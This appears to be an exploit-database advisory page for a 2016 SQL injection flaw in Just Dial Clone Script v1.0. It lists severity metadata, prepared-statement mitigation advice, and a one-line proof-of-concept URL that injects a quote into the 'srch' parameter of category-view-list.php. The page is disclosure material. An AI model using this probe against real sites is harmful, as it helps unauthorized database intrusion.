header-logo
Suggest Exploit
vendor:
Just Dial Clone Script
by:
Arbin Godar
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Just Dial Clone Script
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: No
Related CWE: CVE-2016-7478
CPE: a:i-netsolution:just_dial_clone_script:1.0
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2016

SQL Injection in Just Dial Clone Script

The vulnerability can be mitigated by using prepared statements (with parameterized queries) and by using stored procedures.

Mitigation:

The vulnerability can be mitigated by using prepared statements (with parameterized queries) and by using stored procedures.
Source

Exploit-DB raw data:

# Exploit Title: SQL Injection in Just Dial Clone Script
# Date: 20 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: http://www.i-netsolution.com/

*----------------------------------------------------------------------------------------------------------------------*

# Proof of Concept SQL Injection/Exploit :
http://localhost/[PATH]/category-view-list.php?srch=PoC%27

*----------------------------------------------------------------------------------------------------------------------*